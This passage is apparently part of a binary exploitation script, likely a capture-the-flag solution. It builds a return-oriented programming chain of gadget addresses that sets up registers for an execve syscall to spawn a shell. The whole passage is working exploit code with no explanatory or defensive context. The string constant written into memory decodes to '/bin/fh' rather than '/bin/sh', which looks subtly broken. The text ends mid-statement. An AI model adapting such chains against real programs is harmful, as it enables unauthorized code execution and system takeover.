payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x77d038)+p64(0x45fe27)
# 0x000000000045fe27: pop rax; ret; 
payload += p64(0x68662f6e69622f)+p64(0x488ba5)
# 0x0000000000488ba5: mov qword ptr [rdi + 0x38], rax; xor rcx, rcx; xor rax, rax; ret; 
payload += p64(0x45fe27)
# 0x000000000045fe27: pop rax; ret; 
payload += p64(0x3b)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x77d070)+p64(0x53ce75)
# 0x000000000053ce75: pop rsi; ret; 
payload += p64(0x0)+p64(0x58a258)
# 0x000000000058a258: pop rdx; ret; 
payload += p64(0x0)+p64(0x404b4b)
# 0x0000000000404b4b: syscall; ret; 
payload +=
